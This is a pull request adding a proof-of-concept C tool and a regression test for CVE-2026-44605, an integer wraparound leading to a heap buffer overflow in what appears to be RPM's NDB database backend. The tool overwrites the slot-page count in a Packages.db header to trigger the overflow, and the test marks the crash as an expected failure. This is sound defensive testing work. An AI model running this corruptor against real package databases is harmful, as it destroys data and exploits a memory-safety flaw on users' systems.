### PR TITLE
Add a test for CVE-2026-44605

### DIFF
--- a/tests/data/misc/ndb-corruptor.c
+++ b/tests/data/misc/ndb-corruptor.c
@@ -1,0 +1,50 @@
+/*
+ * CVE-2026-44605 PoC
+ *
+ * Tampers with an NDB database file to trigger an integer wraparound and a
+ * subsequent heap buffer overflow.
+ *
+ * Usage: ./ndb-corruptor NDB_FILE NUM_PAGES
+ *	NDB_FILE: NDB file to corrupt
+ *	NUM_PAGES: pages to allocate
+ */
+
+#include <assert.h>
+#include <limits.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+// NDB macros (from lib/backend/ndb/rpmpkg.c)
+#define PKGDB_OFFSET_SLOTNPAGES 12
+#define SLOT_SIZE		16
+#define PAGE_SIZE		4096
+
+#define UINT_SIZE ((uint64_t)1 << 32)
+// Slots per page
+#define PAGE_SLOTS (PAGE_SIZE / SLOT_SIZE)
+
+int main(int argc, char **argv)
+{
+    if (argc < 3) {
+	fprintf(stderr, "Error: Missing arguments\n");
+	exit(1);
+    }
+
+    FILE *fd = NULL;
+    const char *dbpath = argv[1];
+    int allocpages = atoi(argv[2]);
+
+    unsigned int slotnpages = (UINT_SIZE / PAGE_SLOTS) + allocpages;
+    uint64_t numslots64 = (uint64_t)slotnpages * PAGE_SLOTS;
+    uint32_t numslots32 = numslots64;
+
+    assert(numslots64 > numslots32);
+    printf("Header: %lu slots (%lu pages)\n", numslots64, slotnpages);
+    printf("Allocate: %u slots (%i pages)\n", numslots32, allocpages);
+
+    fd = fopen(dbpath, "r+b");
+    fseek(fd, PKGDB_OFFSET_SLOTNPAGES, SEEK_SET);
+    fwrite(&slotnpages, sizeof(slotnpages), 1, fd);
+    fclose(fd);
+}

--- a/tests/rpmdb.at
+++ b/tests/rpmdb.at
@@ -867,3 +867,30 @@ rpmdb.sqlite-wal
 [])
 
 RPMTEST_CLEANUP
+
+# ------------------------------
+RPMTEST_SETUP_RW([rpmdb ndb heap buffer overflow])
+AT_KEYWORDS([install rpmdb ndb])
+AT_XFAIL_IF([test $RPM_XFAIL -ne 0])
+# this is only relevant with ndb db, make sure we get one
+echo "%_db_backend ndb" >> $RPMTEST/root/.config/rpm/macros
+RPMDB_RESET
+
+gcc -o $RPMTEST/bin/ndb-corruptor /data/misc/ndb-corruptor.c
+
+RPMTEST_CHECK([
+runroot rpm -U --nodeps --ignorearch --ignoreos --nosignature \
+	/data/RPMS/capstest-1.0-1.noarch.rpm \
+	/data/RPMS/foo-1.0-1.noarch.rpm \
+	/data/RPMS/hello-2.0-1.x86_64-signed.rpm \
+	/data/RPMS/hlinktest-1.0-1.noarch.rpm
+# Allocate 0 pages since we have very few packages (1 page = 256 slots)
+runroot ndb-corruptor $(rpm --eval '%_dbpath')/Packages.db 0
+runroot rpm -qa
+],
+[0],
+[Header: 4294967296 slots (16777216 pages)
+Allocate: 0 slots (0 pages)
+],
+[ignore])
+RPMTEST_CLEANUP


### PR DESCRIPTION
Test for a segfault specifically since RPM will return with a non-zero exit code even when this is fixed, whether due to a sanity check failing or simply because we are trying to allocate too much memory here.

Mark it as an expected failure for now as the fix is under review.

Related: #4228